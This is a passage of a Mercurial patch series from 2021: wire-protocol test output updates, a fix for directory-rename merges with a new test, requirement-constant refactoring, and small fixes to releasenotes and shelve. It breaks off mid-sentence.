02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (remote redirect target target-b uses unsupported protocol: unknown) sending capabilities command @@ -731,9 +731,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2295\r\n + s> Content-Length: 2276\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlist
Kpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (redirect target target-bad-tls requires SNI, which is unsupported) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) @@ -1055,9 +1055,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2301\r\n + s> Content-Length: 2282\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\x
a2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614902815 28800 # Thu Mar 04 16:06:55 2021 -0800 # Node ID ad30b29bc23de9533cc7367b5cdc6a925c96898d # Parent 7015b0232c5ea9666e621f7051a744d07a24f7b9 copies: choose target directory based on longest match If one side of a merge renames `dir1/` to `dir2/` and the subdirectory `dir1/subdir1/` to `dir2/subdir2/`, and the other side of the merge adds a file in `dir1/subdir1/`, we should clearly move that into `dir2/subdir2/`. We already detect the directories correctly before this patch, but we iterate over them in arbitrary order. That results in the new file sometimes ending up in `dir2/subdir1/` instead. This patch fixes it by iterating over the source directories by visiting subdirectories first. That's achieved by simply iterating over them in reverse lexicographical order. Without the fix, the test case still passes on Python 2 but fails on Python 3. It depends on the iteration order of the dict. I did not look into how it's built up and why it behaved differently before the fix. I could probably have gotten it to fail on Python 2 as well by choosing different directory names. 
Differential Revision: https://phab.mercurial-scm.org/D10115 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1096,11 +1096,17 @@ b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d]) ) + # Sort the directories in reverse order, so we find children first + # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/ + # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file + # to dir2/subdir2/file (not dir2/subdir1/file) + dirmove_children_first = sorted(dirmove, reverse=True) + movewithdir = {} # check unaccounted nonoverlapping files against directory moves for f in addedfilesfn(): if f not in fullcopy: - for d in dirmove: + for d in dirmove_children_first: if f.startswith(d): # new file added in a directory that was moved, move it df = dirmove[d] + f[len(d) :] diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -294,3 +294,45 @@ M t/t R a/s R a/t + + $ cd .. + + +Test that files are moved to a new directory based on the path prefix that +matches the most. dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets +renamed to dir2/subdir2/. We want dir1/subdir1/newfile to move to +dir2/subdir2/ (not to dir2/subdir1/ as we would infer based on just the rename +of dir1/ to dir2/). 
+ + $ hg init nested-renames + $ cd nested-renames + $ mkdir dir1 + $ echo a > dir1/file1 + $ echo b > dir1/file2 + $ mkdir dir1/subdir1 + $ echo c > dir1/subdir1/file3 + $ echo d > dir1/subdir1/file4 + $ hg ci -Aqm initial + $ hg mv dir1 dir2 + moving dir1/file1 to dir2/file1 + moving dir1/file2 to dir2/file2 + moving dir1/subdir1/file3 to dir2/subdir1/file3 + moving dir1/subdir1/file4 to dir2/subdir1/file4 + $ hg mv dir2/subdir1 dir2/subdir2 + moving dir2/subdir1/file3 to dir2/subdir2/file3 + moving dir2/subdir1/file4 to dir2/subdir2/file4 + $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/' + $ hg co 0 + 4 files updated, 0 files merged, 4 files removed, 0 files unresolved + $ echo e > dir1/subdir1/file5 + $ hg ci -Aqm 'add file in dir1/subdir1/' + $ hg merge 1 + 5 files updated, 0 files merged, 4 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg files + dir2/file1 + dir2/file2 + dir2/subdir2/file3 + dir2/subdir2/file4 + dir2/subdir2/file5 + $ cd .. # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614707478 -3600 # Tue Mar 02 18:51:18 2021 +0100 # Node ID e83327af26f158c21ceac95324dd4cb0e0bdfa96 # Parent ad30b29bc23de9533cc7367b5cdc6a925c96898d pure-parsers: document index class constants This also adds the big endian prefix `>` to make the constants truly platform-independent, even if no issue with this has been reported in the wild. 
Differential Revision: https://phab.mercurial-scm.org/D10104 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -42,10 +42,15 @@ class BaseIndexObject(object): + # Format of an index entry according to Python's `struct` language index_format = b">Qiiiiii20s12x" - big_int_size = struct.calcsize(b'Q') - int_size = struct.calcsize(b'i') + # Size of a C unsigned long long int, platform independent + big_int_size = struct.calcsize(b'>Q') + # Size of a C long int, platform independent + int_size = struct.calcsize(b'>i') + # Size of the entire index format index_size = struct.calcsize(index_format) + # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) @property # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771204 -3600 # Wed Mar 03 12:33:24 2021 +0100 # Node ID c3773636ddbbf2e45f66622091f6dc92eb813af9 # Parent e83327af26f158c21ceac95324dd4cb0e0bdfa96 requirements: also add a dotencode constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10107 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -944,9 +944,8 @@ """Construct a storage object for a repository.""" if b'store' in requirements: if b'fncache' in requirements: - return storemod.fncachestore( - path, vfstype, b'dotencode' in requirements - ) + dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements + return storemod.fncachestore(path, vfstype, dotencode) return storemod.encodedstore(path, vfstype) @@ -1215,7 +1214,7 @@ b'fncache', requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, - b'dotencode', + requirementsmod.DOTENCODE_REQUIREMENT, requirementsmod.SPARSE_REQUIREMENT, requirementsmod.INTERNAL_PHASE_REQUIREMENT, } @@ -3416,7 +3415,7 @@ if ui.configbool(b'format', 
b'usefncache'): requirements.add(b'fncache') if ui.configbool(b'format', b'dotencode'): - requirements.add(b'dotencode') + requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -8,6 +8,7 @@ from __future__ import absolute_import GENERALDELTA_REQUIREMENT = b'generaldelta' +DOTENCODE_REQUIREMENT = b'dotencode' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -217,7 +217,7 @@ class dotencode(requirementformatvariant): name = b'dotencode' - _requirement = b'dotencode' + _requirement = requirements.DOTENCODE_REQUIREMENT default = True @@ -934,7 +934,7 @@ Extensions should monkeypatch this to add their custom requirements. """ supported = { - b'dotencode', + requirements.DOTENCODE_REQUIREMENT, b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, @@ -965,7 +965,7 @@ future, unknown requirements from accidentally being added. 
""" supported = { - b'dotencode', + requirements.DOTENCODE_REQUIREMENT, b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771329 -3600 # Wed Mar 03 12:35:29 2021 +0100 # Node ID ab58098bebed03f0e3e5c65ede72ab4deb2148f5 # Parent c3773636ddbbf2e45f66622091f6dc92eb813af9 requirements: also add a store constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10108 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -942,7 +942,7 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" - if b'store' in requirements: + if requirementsmod.STORE_REQUIREMENT in requirements: if b'fncache' in requirements: dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements return storemod.fncachestore(path, vfstype, dotencode) @@ -1210,7 +1210,7 @@ requirementsmod.SHARESAFE_REQUIREMENT, } _basesupported = supportedformats | { - b'store', + requirementsmod.STORE_REQUIREMENT, b'fncache', requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, @@ -3411,7 +3411,7 @@ requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): - requirements.add(b'store') + requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): requirements.add(b'fncache') if ui.configbool(b'format', b'dotencode'): @@ -3493,7 +3493,7 @@ dropped = set() - if b'store' not in requirements: + if requirementsmod.STORE_REQUIREMENT not in requirements: if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements: ui.warn( _( @@ -3632,7 +3632,8 @@ hgvfs.mkdir(b'cache') hgvfs.mkdir(b'wcache') - if b'store' in requirements and b'sharedrepo' not in createopts: + has_store = requirementsmod.STORE_REQUIREMENT in requirements + if has_store and 
b'sharedrepo' not in createopts: hgvfs.mkdir(b'store') # We create an invalid changelog outside the store so very old diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -9,6 +9,7 @@ GENERALDELTA_REQUIREMENT = b'generaldelta' DOTENCODE_REQUIREMENT = b'dotencode' +STORE_REQUIREMENT = b'store' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -859,7 +859,7 @@ # Introduced in Mercurial 0.9.2. requirements.REVLOGV1_REQUIREMENT, # Introduced in Mercurial 0.9.2. - b'store', + requirements.STORE_REQUIREMENT, } @@ -938,7 +938,7 @@ b'fncache', requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, - b'store', + requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771433 -3600 # Wed Mar 03 12:37:13 2021 +0100 # Node ID b4c2a2af25e2357ac948a161f5d946a2a1b1f96f # Parent ab58098bebed03f0e3e5c65ede72ab4deb2148f5 requirements: also add a fncache constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10109 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -943,7 +943,7 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" if requirementsmod.STORE_REQUIREMENT in requirements: - if b'fncache' in requirements: + if requirementsmod.FNCACHE_REQUIREMENT in requirements: dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements return storemod.fncachestore(path, vfstype, dotencode) @@ -1211,7 +1211,7 @@ } 
_basesupported = supportedformats | { requirementsmod.STORE_REQUIREMENT, - b'fncache', + requirementsmod.FNCACHE_REQUIREMENT, requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, requirementsmod.DOTENCODE_REQUIREMENT, @@ -3413,7 +3413,7 @@ if ui.configbool(b'format', b'usestore'): requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): - requirements.add(b'fncache') + requirements.add(requirementsmod.FNCACHE_REQUIREMENT) if ui.configbool(b'format', b'dotencode'): requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -443,7 +443,7 @@ """ repo = repo.unfiltered() - if b'fncache' not in repo.requirements: + if requirements.FNCACHE_REQUIREMENT not in repo.requirements: ui.warn( _( b'(not rebuilding fncache because repository does not ' diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -10,6 +10,7 @@ GENERALDELTA_REQUIREMENT = b'generaldelta' DOTENCODE_REQUIREMENT = b'dotencode' STORE_REQUIREMENT = b'store' +FNCACHE_REQUIREMENT = b'fncache' # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. 
diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -197,7 +197,7 @@ class fncache(requirementformatvariant): name = b'fncache' - _requirement = b'fncache' + _requirement = requirements.FNCACHE_REQUIREMENT default = True @@ -935,7 +935,7 @@ """ supported = { requirements.DOTENCODE_REQUIREMENT, - b'fncache', + requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, requirements.STORE_REQUIREMENT, @@ -966,7 +966,7 @@ """ supported = { requirements.DOTENCODE_REQUIREMENT, - b'fncache', + requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615008745 -3600 # Sat Mar 06 06:32:25 2021 +0100 # Node ID 88bd085cf2f872962b62db97a17de8a7f2179499 # Parent b4c2a2af25e2357ac948a161f5d946a2a1b1f96f releasenotes: use the right API to access the 'sections' Preventing direct access to the underlying dict fix a breakage introduced by the refactoring in d3df397e7a59. This changeset is similar to 271dfcb98544, 5272542196cc and f7621fa14b84. The breakage of `releasenotes.py` stayed under my radar as the CI did not have fuzzywuzzy installed. (Something that is about to be fixed). 
Differential Revision: https://phab.mercurial-scm.org/D10121 diff --git a/hgext/releasenotes.py b/hgext/releasenotes.py --- a/hgext/releasenotes.py +++ b/hgext/releasenotes.py @@ -280,7 +280,7 @@ if b'.hgreleasenotes' in ctx: read(b'.hgreleasenotes') - return p[b'sections'] + return p.items(b'sections') def checkadmonitions(ui, repo, directives, revs): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615061302 18000 # Sat Mar 06 15:08:22 2021 -0500 # Node ID e571fec5b606667d062b7822589879a08324a1a8 # Parent 88bd085cf2f872962b62db97a17de8a7f2179499 shelve: fix conversion of exceptions to strings flagged by pytype I've seen this done several ways and don't know what's correct. But pytype was unhappy about the previous way: FAILED: /mnt/c/Users/Matt/hg/tests/.pytype/pyi/mercurial/shelve.pyi /usr/bin/python3.6 -m pytype.single --imports_info /mnt/c/Users/Matt/hg/tests/.pytype/imports/mercurial.shelve.imports --module-name mercurial.shelve -V 3.6 -o /mnt/c/Users/Matt/hg/tests/.pytype/pyi/mercurial/shelve.pyi --analyze-annotated --nofail --quick /mnt/c/Users/Matt/hg/mercurial/shelve.py File "/mnt/c/Users/Matt/hg/mercurial/shelve.py", line 244, in _verifyandtransform: Function bytestr.__init__ was called with the wrong arguments [wrong-arg-types] Expected: (self, ints: Iterable[int]) Actually passed: (self, ints: Union[KeyError, TypeError, ValueError]) File "/mnt/c/Users/Matt/hg/mercurial/shelve.py", line 253, in _getversion: Function bytestr.__init__ was called with the wrong arguments [wrong-arg-types] Expected: (self, ints: 